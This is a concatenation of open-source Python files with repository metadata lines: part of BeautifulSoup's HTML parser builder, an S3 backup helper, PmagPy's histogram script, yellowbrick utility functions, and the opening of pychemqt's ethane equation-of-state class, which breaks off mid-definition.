data = data[len("DOCTYPE "):]
self.soup.handle_data(data)
self.soup.endData(Doctype)
def unknown_decl(self, data):
if data.upper().startswith('CDATA['):
cls = CData
data = data[len('CDATA['):]
else:
cls = Declaration
self.soup.endData()
self.soup.handle_data(data)
self.soup.endData(cls)
def handle_pi(self, data):
self.soup.endData()
if data.endswith("?") and data.lower().startswith("xml"):
# "An XHTML processing instruction using the trailing '?'
# will cause the '?' to be included in data." - HTMLParser
# docs.
#
# Strip the question mark so we don't end up with two
# question marks.
data = data[:-1]
self.soup.handle_data(data)
self.soup.endData(ProcessingInstruction)
class HTMLParserTreeBuilder(HTMLTreeBuilder):
is_xml = False
features = [HTML, STRICT, HTMLPARSER]
def __init__(self, *args, **kwargs):
if CONSTRUCTOR_TAKES_STRICT:
kwargs['strict'] = False
self.parser_args = (args, kwargs)
def prepare_markup(self, markup, user_specified_encoding=None,
document_declared_encoding=None):
"""
:return: A 4-tuple (markup, original encoding, encoding
declared within markup, whether any characters had to be
replaced with REPLACEMENT CHARACTER).
"""
if isinstance(markup, unicode):
return markup, None, None, False
try_encodings = [user_specified_encoding, document_declared_encoding]
dammit = UnicodeDammit(markup, try_encodings, is_html=True)
return (dammit.markup, dammit.original_encoding,
dammit.declared_html_encoding,
dammit.contains_replacement_characters)
def feed(self, markup):
args, kwargs = self.parser_args
parser = BeautifulSoupHTMLParser(*args, **kwargs)
parser.soup = self.soup
try:
parser.feed(markup)
except HTMLParseError, e:
warnings.warn(RuntimeWarning(
"Python's built-in HTMLParser cannot parse the given document. This is not a bug in Beautiful Soup. The best solution is to install an external parser (lxml or html5lib), and use Beautiful Soup with that parser. See http://www.crummy.com/software/BeautifulSoup/bs4/doc/#installing-a-parser for help."))
raise e
# Patch 3.2 versions of HTMLParser earlier than 3.2.3 to use some
# 3.2.3 code. This ensures they don't treat markup like <p></p> as a
# string.
#
# XXX This code can be removed once most Python 3 users are on 3.2.3.
if major == 3 and minor == 2 and not CONSTRUCTOR_TAKES_STRICT:
import re
attrfind_tolerant = re.compile(
r'\s*((?<=[\'"\s])[^\s/>][^\s/=>]*)(\s*=+\s*'
r'(\'[^\']*\'|"[^"]*"|(?![\'"])[^>\s]*))?')
HTMLParserTreeBuilder.attrfind_tolerant = attrfind_tolerant
locatestarttagend = re.compile(r"""
<[a-zA-Z][-.a-zA-Z0-9:_]* # tag name
(?:\s+ # whitespace before attribute name
(?:[a-zA-Z_][-.:a-zA-Z0-9_]* # attribute name
(?:\s*=\s* # value indicator
(?:'[^']*' # LITA-enclosed value
|\"[^\"]*\" # LIT-enclosed value
|[^'\">\s]+ # bare value
)
)?
)
)*
\s* # trailing whitespace
""", re.VERBOSE)
BeautifulSoupHTMLParser.locatestarttagend = locatestarttagend
from html.parser import tagfind, attrfind
def parse_starttag(self, i):
self.__starttag_text = None
endpos = self.check_for_whole_start_tag(i)
if endpos < 0:
return endpos
rawdata = self.rawdata
self.__starttag_text = rawdata[i:endpos]
# Now parse the data between i+1 and j into a tag and attrs
attrs = []
match = tagfind.match(rawdata, i+1)
assert match, 'unexpected call to parse_starttag()'
k = match.end()
self.lasttag = tag = rawdata[i+1:k].lower()
while k < endpos:
if self.strict:
m = attrfind.match(rawdata, k)
else:
m = attrfind_tolerant.match(rawdata, k)
if not m:
break
attrname, rest, attrvalue = m.group(1, 2, 3)
if not rest:
attrvalue = None
elif attrvalue[:1] == '\'' == attrvalue[-1:] or \
attrvalue[:1] == '"' == attrvalue[-1:]:
attrvalue = attrvalue[1:-1]
if attrvalue:
attrvalue = self.unescape(attrvalue)
attrs.append((attrname.lower(), attrvalue))
k = m.end()
end = rawdata[k:endpos].strip()
if end not in (">", "/>"):
lineno, offset = self.getpos()
if "\n" in self.__starttag_text:
lineno = lineno + self.__starttag_text.count("\n")
offset = len(self.__starttag_text) \
- self.__starttag_text.rfind("\n")
else:
offset = offset + len(self.__starttag_text)
if self.strict:
self.error("junk characters in start tag: %r"
% (rawdata[k:endpos][:20],))
self.handle_data(rawdata[i:endpos])
return endpos
if end.endswith('/>'):
# XHTML-style empty tag: <span attr="value" />
self.handle_startendtag(tag, attrs)
else:
self.handle_starttag(tag, attrs)
if tag in self.CDATA_CONTENT_ELEMENTS:
self.set_cdata_mode(tag)
return endpos
def set_cdata_mode(self, elem):
self.cdata_elem = elem.lower()
self.interesting = re.compile(r'</\s*%s\s*>' % self.cdata_elem, re.I)
BeautifulSoupHTMLParser.parse_starttag = parse_starttag
BeautifulSoupHTMLParser.set_cdata_mode = set_cdata_mode
CONSTRUCTOR_TAKES_STRICT = True
| gpl-3.0 | -4,245,565,650,335,776,300 | 33.209016 | 318 | 0.567988 | false |
nyodas/enjoliver | app/objs3.py | 1 | 2316 | """
Interface with S3 to store / fetch backups
"""
import os
import time
import boto3
import logger
from configs import EnjoliverConfig
class S3Operator(object):
log = logger.get_logger(__file__)
def __init__(self, bucket_name):
ec = EnjoliverConfig(importer=__file__)
aws_id = ec.aws_id
aws_secret = ec.aws_secret
self.bucket_name = bucket_name
if not bucket_name:
self.log.error("bucket_name=%s" % bucket_name)
raise AttributeError("bucket_name is not defined: %s" % bucket_name)
if aws_id is None or aws_secret is None:
self.log.error("Missing the couple AWS_ACCESS_KEY_ID AWS_SECRET_ACCESS_KEY")
raise EnvironmentError("Missing the couple AWS_ACCESS_KEY_ID AWS_SECRET_ACCESS_KEY")
self.log.info("connect to bucket name: %s" % bucket_name)
self.s3 = boto3.resource('s3')
self.bucket = self.s3.Bucket(bucket_name)
def upload(self, source, dest):
if os.path.isfile(source) is False:
raise IOError(source)
obj = self.s3.Object(self.bucket_name, dest)
stats = os.stat(source)
metadata = {
"uploaded": "%d" % time.time(),
"created": "%d" % stats.st_ctime,
"modified": "%d" % stats.st_mtime,
"size": "%d" % stats.st_size
}
obj.put(Body=open(source, 'rb'), Metadata=metadata)
self.log.info("upload done source: %s dest: %s metadata: %s" % (source, dest, metadata))
def download(self, source, dest):
obj = self.s3.Object(self.bucket_name, source)
        r = obj.get()
        with open(dest, 'wb') as f:
            f.write(r['Body'].read())
        self.log.info("download done source: %s dest: %s" % (source, dest))
def get_last_uploaded(self, prefix):
keys = []
self.log.debug("prefix use %s" % prefix)
for item in self.bucket.objects.all():
self.log.debug("list in bucket: %s" % item.key)
keys.append({"key": item.key, "last_modified": item.last_modified})
keys.sort(key=lambda k: k["last_modified"])
keys.reverse()
latest = keys[0]
key_name = latest["key"]
self.log.info("return latest upload: %s" % key_name)
return key_name
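# Typical usage (a sketch; the bucket name and paths below are made up for
# illustration, and credentials come from EnjoliverConfig as read in __init__):
#   op = S3Operator("enjoliver-backups")
#   op.upload("/var/lib/backup/etcd.tar.gz", "etcd/etcd.tar.gz")
#   latest = op.get_last_uploaded(prefix="etcd/")
#   op.download(latest, "/tmp/etcd.tar.gz")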
| mit | 7,340,518,615,331,652,000 | 33.058824 | 96 | 0.584629 | false |
PmagPy/PmagPy | programs/histplot.py | 1 | 1769 | #!/usr/bin/env python
from pmagpy import pmag
from pmagpy import pmagplotlib
from matplotlib import pyplot as plt
import sys
import os
import numpy as np
import matplotlib
if matplotlib.get_backend() != "TKAgg":
matplotlib.use("TKAgg")
from pmagpy import ipmag
def main():
"""
NAME
histplot.py
DESCRIPTION
makes histograms for data
OPTIONS
-h prints help message and quits
-f input file name
-b binsize
-fmt [svg,png,pdf,eps,jpg] specify format for image, default is svg
-sav save figure and quit
-F output file name, default is hist.fmt
-N don't normalize
-twin plot both normalized and un-normalized y axes
-xlab Label of X axis
-ylab Label of Y axis
INPUT FORMAT
single variable
SYNTAX
histplot.py [command line options] [<file]
"""
interactive = True
save_plots = False
if '-sav' in sys.argv:
save_plots = True
interactive = False
if '-h' in sys.argv:
print(main.__doc__)
sys.exit()
fmt = pmag.get_named_arg('-fmt', 'svg')
fname = pmag.get_named_arg('-f', '')
outfile = pmag.get_named_arg("-F", "")
norm = 1
if '-N' in sys.argv:
norm = 0
if '-twin' in sys.argv:
norm = - 1
binsize = pmag.get_named_arg('-b', 0)
if '-xlab' in sys.argv:
ind = sys.argv.index('-xlab')
xlab = sys.argv[ind+1]
else:
xlab = 'x'
data = []
if not fname:
print('-I- Trying to read from stdin... <ctrl>-c to quit')
data = np.loadtxt(sys.stdin, dtype=np.float)
ipmag.histplot(fname, data, outfile, xlab, binsize, norm,
fmt, save_plots, interactive)
if __name__ == "__main__":
main()
| bsd-3-clause | 3,270,431,581,391,425,500 | 23.232877 | 74 | 0.58225 | false |
pdamodaran/yellowbrick | yellowbrick/utils/helpers.py | 1 | 6103 | # yellowbrick.utils.helpers
# Helper functions and generic utilities for use in Yellowbrick code.
#
# Author: Benjamin Bengfort <[email protected]>
# Created: Fri May 19 10:39:30 2017 -0700
#
# Copyright (C) 2017 District Data Labs
# For license information, see LICENSE.txt
#
# ID: helpers.py [79cd8cf] [email protected] $
"""
Helper functions and generic utilities for use in Yellowbrick code.
"""
##########################################################################
## Imports
##########################################################################
import re
import numpy as np
from sklearn.pipeline import Pipeline
from .types import is_estimator
from yellowbrick.exceptions import YellowbrickTypeError
##########################################################################
## Model and Feature Information
##########################################################################
def get_model_name(model):
"""
Detects the model name for a Scikit-Learn model or pipeline.
Parameters
----------
model: class or instance
The object to determine the name for. If the model is an estimator it
returns the class name; if it is a Pipeline it returns the class name
of the final transformer or estimator in the Pipeline.
Returns
-------
name : string
The name of the model or pipeline.
"""
if not is_estimator(model):
raise YellowbrickTypeError(
"Cannot detect the model name for non estimator: '{}'".format(
type(model)
)
)
else:
if isinstance(model, Pipeline):
return get_model_name(model.steps[-1][-1])
else:
return model.__class__.__name__
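# For example (an illustrative call, not from the package docs): for a bare
# estimator such as Lasso(), get_model_name returns "Lasso"; for
# Pipeline([("scale", StandardScaler()), ("clf", Lasso())]) it also returns
# "Lasso", since only the final step of the pipeline is inspected.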
def has_ndarray_int_columns(features, X):
""" Checks if numeric feature columns exist in ndarray """
_, ncols = X.shape
if not all(d.isdigit() for d in features if isinstance(d, str)) or not isinstance(X, np.ndarray):
return False
ndarray_columns = np.arange(0, ncols)
feature_cols = np.unique([int(d) for d in features])
return all(np.in1d(feature_cols, ndarray_columns))
# Alias for closer name to isinstance and issubclass
hasndarrayintcolumns = has_ndarray_int_columns
def is_monotonic(a, increasing=True):
"""
Tests whether a vector a has monotonicity.
Parameters
----------
a : array-like
Array that should be tested for monotonicity
increasing : bool, default: True
        Test if the array is monotonically increasing, otherwise test if the
        array is monotonically decreasing.
"""
a = np.asarray(a) # ensure a is array-like
if a.ndim > 1:
        raise ValueError("not supported for multi-dimensional arrays")
if len(a) <= 1:
return True
if increasing:
return np.all(a[1:] >= a[:-1], axis=0)
return np.all(a[1:] <= a[:-1], axis=0)
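# Quick sanity checks (illustrative, not part of the module's doctests):
# is_monotonic([1, 2, 2, 3]) -> True, is_monotonic([1, 0, 1]) -> False,
# is_monotonic([3, 2, 1], increasing=False) -> True.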
##########################################################################
## Numeric Computations
##########################################################################
#From here: http://stackoverflow.com/questions/26248654/numpy-return-0-with-divide-by-zero
def div_safe( numerator, denominator ):
"""
Ufunc-extension that returns 0 instead of nan when dividing numpy arrays
Parameters
----------
numerator: array-like
denominator: scalar or array-like that can be validly divided by the numerator
returns a numpy array
example: div_safe( [-1, 0, 1], 0 ) == [0, 0, 0]
"""
#First handle scalars
if np.isscalar(numerator):
raise ValueError("div_safe should only be used with an array-like numerator")
#Then numpy arrays
try:
with np.errstate(divide='ignore', invalid='ignore'):
result = np.true_divide( numerator, denominator )
result[ ~ np.isfinite( result )] = 0 # -inf inf NaN
return result
except ValueError as e:
raise e
def prop_to_size(vals, mi=0.0, ma=5.0, power=0.5, log=False):
"""
Converts an array of property values (e.g. a metric or score) to values
that are more useful for marker sizes, line widths, or other visual
sizes. The new sizes are computed as:
        y = mi + (ma - mi) \left(\frac{x_i - \min(x)}{\max(x) - \min(x)}\right)^{power}
If ``log=True``, the natural logarithm of the property values is used instead.
Parameters
----------
prop : array-like, 1D
An array of values of the property to scale between the size range.
mi : float, default: 0.0
The size to assign the smallest property (minimum size value).
ma : float, default: 5.0
The size to assign the largest property (maximum size value).
power : float, default: 0.5
Used to control how rapidly the size increases from smallest to largest.
log : bool, default: False
Use the natural logarithm to compute the property sizes
Returns
-------
sizes : array, 1D
The new size values, in the same shape as the input prop array
"""
    # ensure that vals is an array
vals = np.asarray(vals)
# apply natural log if specified
if log:
vals = np.log(vals)
# avoid division by zero error
delta = vals.max() - vals.min()
if delta == 0.0:
delta = 1.0
return mi + (ma-mi) * ((vals -vals.min()) / delta) ** power
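# A rough worked example (numbers are illustrative only): prop_to_size([1, 4, 9])
# with the defaults mi=0.0, ma=5.0, power=0.5 normalises the values to
# [0, 0.375, 1] and returns roughly [0.0, 3.06, 5.0], since 5 * 0.375**0.5 is about 3.06.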
##########################################################################
## String Computations
##########################################################################
def slugify(text):
"""
Returns a slug of given text, normalizing unicode data for file-safe
strings. Used for deciding where to write images to disk.
Parameters
----------
text : string
The string to slugify
Returns
-------
slug : string
A normalized slug representation of the text
.. seealso:: http://yashchandra.com/2014/05/08/how-to-generate-clean-url-or-a-slug-in-python/
"""
slug = re.sub(r'[^\w]+', ' ', text)
slug = "-".join(slug.lower().strip().split())
return slug
| apache-2.0 | 4,644,387,337,907,354,000 | 28.626214 | 101 | 0.574144 | false |
edusegzy/pychemqt | lib/mEoS/C2.py | 1 | 34267 | #!/usr/bin/python
# -*- coding: utf-8 -*-
from lib.meos import MEoS
from lib import unidades
class C2(MEoS):
"""Multiparameter equation of state for ethane"""
name = "ethane"
CASNumber = "74-84-0"
formula = "CH3CH3"
synonym = "R-170"
rhoc = unidades.Density(206.18)
Tc = unidades.Temperature(305.322)
Pc = unidades.Pressure(4872.2, "kPa")
M = 30.06904 # g/mol
Tt = unidades.Temperature(90.368)
Tb = unidades.Temperature(184.569)
f_acent = 0.0995
momentoDipolar = unidades.DipoleMoment(0.0, "Debye")
id = 3
_Tr = unidades.Temperature(295.159630)
_rhor = unidades.Density(207.557649)
_w = 0.095234716
Fi1 = {"R": 8.314472,
"ao_log": [1, 3.003039265],
"pow": [0, 1],
"ao_pow": [9.212802589, -4.68224855],
"ao_exp": [1.117433359, 3.467773215, 6.941944640, 5.970850948],
"titao": [1.4091052332, 4.0099170712, 6.5967098342, 13.9798102659]}
Fi2 = {"ao_log": [1, 3.00263],
"pow": [0, 1],
"ao_pow": [24.675437527, -77.42531376],
"ao_exp": [], "titao": [],
"ao_hyp": [4.33939, 1.23722, 13.1974, -6.01989],
"hyp": [1.831882406, 0.731306621, 3.378007481, 3.508721939]}
Fi3 = {"ao_log": [1, 3.8159476],
"pow": [0, -1./3, -2./3, -1],
"ao_pow": [-23.446765, 8.6021299, -3.3075735, -.55956678],
"ao_exp": [5.0722267], "titao": [5.5074874],
"ao_hyp": [], "hyp": []}
CP5 = {"ao": 9.9507922459,
"an": [-6.9341406909e5, 3.1534834135e4, -6.103375287e2,
-2.8657877948e-2, 9.0922897821e-5, -5.2750109915e-8],
"pow": [-3, -2, -1.001, 1, 2, 3],
"ao_exp": [-1.4243593411e1], "exp": [3000],
"ao_hyp": [], "hyp": []}
helmholtz1 = {
"__type__": "Helmholtz",
"__name__": "Helmholtz equation of state for ethane of Buecker and Wagner (2006)",
"__doi__": {"autor": "Bücker, D., Wagner, W.",
"title": "A Reference Equation of State for the Thermodynamic Properties of Ethane for Temperatures from the Melting Line to 675 K and Pressures up to 900 MPa",
"ref": "J. Phys. Chem. Ref. Data 35, 205 (2006)",
"doi": "10.1063/1.1859286"},
"__test__":
# Table 29, Pag 238
"""
>>> st=C2(T=90.368, x=0.5)
>>> print "%0.6g %0.7f %0.5f %0.6f %0.5g %0.5g %0.4g %0.4g %0.4g %0.3f %0.4g %0.4g %0.2f %0.2f" % (\
st.T, st.P.MPa, st.Liquido.rho, st.Gas.rho, st.Liquido.h.kJkg, st.Gas.h.kJkg, \
st.Liquido.s.kJkgK, st.Gas.s.kJkgK, st.Liquido.cv.kJkgK, st.Gas.cv.kJkgK, \
st.Liquido.cp.kJkgK, st.Gas.cp.kJkgK, st.Liquido.w, st.Gas.w)
90.368 0.0000011 651.52948 0.000046 -888.9 -294.12 -5.058 1.524 1.605 0.892 2.326 1.168 2008.69 180.93
>>> st=C2(T=100, x=0.5)
>>> print "%0.6g %0.6f %0.5f %0.5f %0.5g %0.5g %0.4g %0.4g %0.4g %0.3f %0.4g %0.4g %0.2f %0.2f" % (\
st.T, st.P.MPa, st.Liquido.rho, st.Gas.rho, st.Liquido.h.kJkg, st.Gas.h.kJkg, \
st.Liquido.s.kJkgK, st.Gas.s.kJkgK, st.Liquido.cv.kJkgK, st.Gas.cv.kJkgK, \
st.Liquido.cp.kJkgK, st.Gas.cp.kJkgK, st.Liquido.w, st.Gas.w)
100 0.000011 640.94852 0.00040 -866.74 -282.78 -4.825 1.015 1.541 0.911 2.283 1.187 1938.44 189.86
>>> st=C2(T=130, x=0.5)
>>> print "%0.6g %0.6f %0.5f %0.5f %0.5g %0.5g %0.3f %0.3f %0.3f %0.3f %0.3f %0.3f %0.2f %0.2f" % (\
st.T, st.P.MPa, st.Liquido.rho, st.Gas.rho, st.Liquido.h.kJkg, st.Gas.h.kJkg, \
st.Liquido.s.kJkgK, st.Gas.s.kJkgK, st.Liquido.cv.kJkgK, st.Gas.cv.kJkgK, \
st.Liquido.cp.kJkgK, st.Gas.cp.kJkgK, st.Liquido.w, st.Gas.w)
130 0.001284 607.82999 0.03576 -798.36 -246.43 -4.227 0.019 1.462 0.977 2.293 1.256 1722.03 214.69
>>> st=C2(T=150, x=0.5)
>>> print "%0.6g %0.6f %0.5f %0.5f %0.5g %0.5g %0.3f %0.3f %0.3f %0.3f %0.3f %0.3f %0.2f %0.2f" % (\
st.T, st.P.MPa, st.Liquido.rho, st.Gas.rho, st.Liquido.h.kJkg, st.Gas.h.kJkg, \
st.Liquido.s.kJkgK, st.Gas.s.kJkgK, st.Liquido.cv.kJkgK, st.Gas.cv.kJkgK, \
st.Liquido.cp.kJkgK, st.Gas.cp.kJkgK, st.Liquido.w, st.Gas.w)
150 0.009638 585.16884 0.23373 -752.12 -221.71 -3.896 -0.360 1.442 1.027 2.333 1.312 1575.53 228.84
>>> st=C2(T=180, x=0.5)
>>> print "%0.6g %0.6f %0.5f %0.5f %0.5g %0.5g %0.3f %0.3f %0.3f %0.3f %0.3f %0.3f %0.2f %0.2f" % (\
st.T, st.P.MPa, st.Liquido.rho, st.Gas.rho, st.Liquido.h.kJkg, st.Gas.h.kJkg, \
st.Liquido.s.kJkgK, st.Gas.s.kJkgK, st.Liquido.cv.kJkgK, st.Gas.cv.kJkgK, \
st.Liquido.cp.kJkgK, st.Gas.cp.kJkgK, st.Liquido.w, st.Gas.w)
180 0.078638 549.50874 1.62533 -680.84 -185.53 -3.464 -0.712 1.434 1.098 2.421 1.409 1350.47 245.54
>>> st=C2(T=210, x=0.5)
>>> print "%0.6g %0.6f %0.5f %0.5f %0.5g %0.5g %0.3f %0.3f %0.3f %0.3f %0.3f %0.3f %0.2f %0.2f" % (\
st.T, st.P.MPa, st.Liquido.rho, st.Gas.rho, st.Liquido.h.kJkg, st.Gas.h.kJkg, \
st.Liquido.s.kJkgK, st.Gas.s.kJkgK, st.Liquido.cv.kJkgK, st.Gas.cv.kJkgK, \
st.Liquido.cp.kJkgK, st.Gas.cp.kJkgK, st.Liquido.w, st.Gas.w)
210 0.333796 510.45075 6.23900 -605.9 -153.48 -3.081 -0.927 1.454 1.228 2.572 1.622 1117.27 254.02
>>> st=C2(T=240, x=0.5)
>>> print "%0.6g %0.6f %0.5f %0.5f %0.5g %0.5g %0.3f %0.3f %0.3f %0.3f %0.3f %0.3f %0.2f %0.2f" % (\
st.T, st.P.MPa, st.Liquido.rho, st.Gas.rho, st.Liquido.h.kJkg, st.Gas.h.kJkg, \
st.Liquido.s.kJkgK, st.Gas.s.kJkgK, st.Liquido.cv.kJkgK, st.Gas.cv.kJkgK, \
st.Liquido.cp.kJkgK, st.Gas.cp.kJkgK, st.Liquido.w, st.Gas.w)
240 0.966788 465.30887 17.43487 -524.72 -128.82 -2.726 -1.077 1.507 1.388 2.847 1.976 873.25 252.14
>>> st=C2(T=270, x=0.5)
>>> print "%0.6g %0.6f %0.5f %0.5f %0.5g %0.5g %0.3f %0.3f %0.3f %0.3f %0.3f %0.3f %0.2f %0.2f" % (\
st.T, st.P.MPa, st.Liquido.rho, st.Gas.rho, st.Liquido.h.kJkg, st.Gas.h.kJkg, \
st.Liquido.s.kJkgK, st.Gas.s.kJkgK, st.Liquido.cv.kJkgK, st.Gas.cv.kJkgK, \
st.Liquido.cp.kJkgK, st.Gas.cp.kJkgK, st.Liquido.w, st.Gas.w)
270 2.209980 407.71776 42.08922 -432.13 -118.38 -2.375 -1.212 1.605 1.595 3.491 2.815 608.92 237.02
>>> st=C2(T=300, x=0.5)
>>> print "%0.6g %0.6f %0.5f %0.5f %0.5g %0.5g %0.3f %0.3f %0.3f %0.3f %0.3f %0.3f %0.2f %0.2f" % (\
st.T, st.P.MPa, st.Liquido.rho, st.Gas.rho, st.Liquido.h.kJkg, st.Gas.h.kJkg, \
st.Liquido.s.kJkgK, st.Gas.s.kJkgK, st.Liquido.cv.kJkgK, st.Gas.cv.kJkgK, \
st.Liquido.cp.kJkgK, st.Gas.cp.kJkgK, st.Liquido.w, st.Gas.w)
300 4.357255 303.50879 114.50091 -305.32 -155.61 -1.952 -1.453 1.912 2.089 10.022 13.299 274.91 200.51
>>> st=C2(T=305, x=0.5)
>>> print "%0.6g %0.6f %0.5f %0.5f %0.5g %0.5g %0.3f %0.3f %0.3f %0.3f %0.3f %0.3f %0.2f %0.2f" % (\
st.T, st.P.MPa, st.Liquido.rho, st.Gas.rho, st.Liquido.h.kJkg, st.Gas.h.kJkg, \
st.Liquido.s.kJkgK, st.Gas.s.kJkgK, st.Liquido.cv.kJkgK, st.Gas.cv.kJkgK, \
st.Liquido.cp.kJkgK, st.Gas.cp.kJkgK, st.Liquido.w, st.Gas.w)
305 4.839225 241.96149 170.75482 -255.73 -202.19 -1.794 -1.619 2.470 2.623 164.093 247.460 175.12 178.83
"""
# Table 30, Pag 243
"""
>>> st=C2(T=90.384, P=1e5)
>>> print "%0.6g %0.5g %0.5g %0.5g %0.5g %0.5g %0.5g %0.6g" % (\
st.T, st.rho, st.u.kJkg, st.h.kJkg, st.s.kJkgK, st.cv.kJkgK, st.cp.kJkgK, st.w)
90.384 651.55 -888.88 -888.73 -5.0574 1.6051 2.3256 2008.97
>>> st=C2(T=135, P=5e5)
>>> print "%0.6g %0.5g %0.5g %0.5g %0.5g %0.5g %0.5g %0.6g" % (\
st.T, st.rho, st.u.kJkg, st.h.kJkg, st.s.kJkgK, st.cv.kJkgK, st.cp.kJkgK, st.w)
135 602.5 -787.09 -786.26 -4.1415 1.4563 2.3009 1688.21
>>> st=C2(T=220, P=1e6)
>>> print "%0.6g %0.5g %0.5g %0.5g %0.5g %0.5g %0.5g %0.6g" % (\
st.T, st.rho, st.u.kJkg, st.h.kJkg, st.s.kJkgK, st.cv.kJkgK, st.cp.kJkgK, st.w)
220 497.12 -581.36 -579.35 -2.9641 1.4681 2.6365 1044.02
>>> st=C2(T=110, P=1.5e6)
>>> print "%0.6g %0.5g %0.5g %0.5g %0.5g %0.5g %0.5g %0.6g" % (\
st.T, st.rho, st.u.kJkg, st.h.kJkg, st.s.kJkgK, st.cv.kJkgK, st.cp.kJkgK, st.w)
110 630.62 -844.43 -842.05 -4.6118 1.5041 2.2713 1872.62
>>> st=C2(T=675, P=2e6)
>>> print "%0.6g %0.5g %0.5g %0.5g %0.5g %0.5g %0.5g %0.6g" % (\
st.T, st.rho, st.u.kJkg, st.h.kJkg, st.s.kJkgK, st.cv.kJkgK, st.cp.kJkgK, st.w)
675 10.756 754.73 940.67 1.1385 2.9468 3.2442 451.69
>>> st=C2(T=310, P=5e6)
>>> print "%0.6g %0.5g %0.5g %0.5g %0.5g %0.5g %0.5g %0.6g" % (\
st.T, st.rho, st.u.kJkg, st.h.kJkg, st.s.kJkgK, st.cv.kJkgK, st.cp.kJkgK, st.w)
310 123.88 -181.86 -141.49 -1.4246 1.9621 8.6868 211.1
>>> st=C2(T=160, P=1e7)
>>> print "%0.6g %0.5g %0.5g %0.5g %0.5g %0.5g %0.5g %0.6g" % (\
st.T, st.rho, st.u.kJkg, st.h.kJkg, st.s.kJkgK, st.cv.kJkgK, st.cp.kJkgK, st.w)
160 580.45 -734.04 -716.81 -3.7788 1.4493 2.3263 1563.69
>>> st=C2(T=500, P=2e7)
>>> print "%0.6g %0.5g %0.5g %0.5g %0.5g %0.5g %0.5g %0.5g" % (\
st.T, st.rho, st.u.kJkg, st.h.kJkg, st.s.kJkgK, st.cv.kJkgK, st.cp.kJkgK, st.w)
500 164.96 184.25 305.49 -0.5687 2.3996 3.2172 416.34
>>> st=C2(T=100, P=5e7)
>>> print "%0.6g %0.5g %0.5g %0.5g %0.5g %0.5g %0.5g %0.6g" % (\
st.T, st.rho, st.u.kJkg, st.h.kJkg, st.s.kJkgK, st.cv.kJkgK, st.cp.kJkgK, st.w)
100 658.54 -877.76 -801.84 -4.9448 1.6011 2.2516 2107.34
>>> st=C2(T=450, P=1e8)
>>> print "%0.6g %0.5g %0.5g %0.5g %0.5g %0.5g %0.5g %0.6g" % (\
st.T, st.rho, st.u.kJkg, st.h.kJkg, st.s.kJkgK, st.cv.kJkgK, st.cp.kJkgK, st.w)
450 428.87 -108.47 124.7 -1.471 2.2729 2.9465 1075.84
>>> st=C2(T=675, P=9e8)
>>> print "%0.6g %0.5g %0.5g %0.6g %0.5g %0.5g %0.5g %0.6g" % (\
st.T, st.rho, st.u.kJkg, st.h.kJkg, st.s.kJkgK, st.cv.kJkgK, st.cp.kJkgK, st.w)
675 632.88 443.09 1865.16 -0.95311 3.2264 3.638 2628.58
""",
"R": 8.314472,
"cp": Fi1,
"ref": "OTO",
"Tmin": Tt, "Tmax": 675.0, "Pmax": 900000.0, "rhomax": 22.419,
"Pmin": 0.00114, "rhomin": 21.668,
"nr1": [0.83440745735241, -0.14287360607171e1, 0.34430242210927,
-0.42096677920265, 0.12094500886549e-1],
"d1": [1, 1, 2, 2, 4],
"t1": [0.25, 1.00, 0.25, 0.75, 0.75],
"nr2": [-0.57976201597341, -0.33127037870838e-1, -0.11751654894130,
-0.11160957833067, 0.62181592654406e-1, 0.98481795434443e-1,
-0.98268582682358e-1, -0.23977831007049e-3, 0.69885663328821e-3,
0.19665987803305e-4, -0.14586152207928e-1, 0.46354100536781e-1,
0.60764622180645e-2, -0.26447330147828e-2, -0.42931872689904e-1,
0.29987786517263e-2, 0.52919335175010e-2, -0.10383897798198e-2,
-0.54260348214694e-1, -0.21959362918493, 0.35362456650354,
-0.12477390173714, 0.18425693591517, -0.16192256436754,
-0.82770876149064e-1, 0.50160758096437e-1, 0.93614326336655e-2,
-0.27839186242864e-3, 0.23560274071481e-4, 0.39238329738527e-2,
-0.76488325813618e-3, -0.49944304440730e-2,
0.18593386407186e-2, -0.61404353331199e-3],
"d2": [1, 1, 2, 2, 3, 6, 6, 7, 9, 10, 2, 4, 4, 5, 5, 6, 8, 9, 2, 3, 3,
3, 4, 4, 5, 5, 6, 11, 14, 3, 3, 4, 8, 10],
"t2": [2.00, 4.25, 0.75, 2.25, 3.00, 1.00, 1.25, 2.75, 1.00, 2.00,
2.50, 5.50, 7.00, 0.50, 5.50, 2.50, 4.00, 2.00, 10.00, 16.00,
18.00, 20.00, 14.00, 18.00, 12.00, 19.00, 7.00, 15.00, 9.00,
26.00, 28.00, 28.00, 22.00, 13.00],
"c2": [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2, 2, 2, 3, 3, 3,
3, 3, 3, 3, 3, 3, 3, 3, 4, 4, 4, 4, 4],
"gamma2": [1]*34,
"nr3": [-0.23312179367924e-2, 0.29301047908760e-2, -0.26912472842883e-3,
0.18413834111814e3, -0.10397127984854e2],
"d3": [1, 1, 3, 3, 2],
"t3": [0., 3., 3., 0., 3.],
"alfa3": [15, 15, 15, 20, 20],
"beta3": [150, 150, 150, 275, 400],
"gamma3": [1.05, 1.05, 1.05, 1.22, 1.16],
"epsilon3": [1]*5}
MBWR = {
"__type__": "MBWR",
"__name__": "MBWR equation of state for ethane of Younglove and Ely (1987)",
"__doi__": {"autor": "Younglove, B.A. and Ely, J.F.",
"title": "Thermophysical Properties of Fluids. II. Methane, Ethane, Propane, Isobutane, and Normal Butane ",
"ref": "J. Phys. Chem. Ref. Data 16, 577 (1987)",
"doi": "10.1063/1.555785"},
"R": 8.31434,
"cp": CP5,
"ref": {"Tref": 298.15, "Pref": 101.325, "ho": 11874.2, "so": 229.116},
"Tmin": 90.348, "Tmax": 600.0, "Pmax": 70000.0, "rhomax": 21.68,
"Pmin": 1.1308e-3, "rhomin": 21.68,
"b": [None, -0.3204748852e-2, 0.6529792241, -0.1669704591e2,
0.1147983381e4, -0.1854721998e6, 0.4994149431e-3, -0.4858871291,
0.1225345776e3, 0.8622615988e5, -0.1081290283e-4, 0.6279096996e-1,
-0.1716912675e2, -0.1640779401e-3, -0.4356516111e-1, -0.1966649699e2,
0.4026724698e-2, -0.6498241861e-4, 0.5111594139e-1, -0.1113010349e-2,
-0.7157747547e4, -0.1848571024e8, -0.2137365569e4, 0.6275079986e8,
-0.9974911056e1, 0.1129115014e4, -0.1026469558, -0.5660525915e4,
-0.4209846430e-3, 0.2374523553, -0.1289637823e-5,
-0.5423801068e-3, 0.2239717230e-1]}
GERG = {
"__type__": "Helmholtz",
"__name__": "Helmholtz equation of state for ethane of Kunz and Wagner (2004).",
"__doi__": {"autor": "Kunz, O., Wagner, W.",
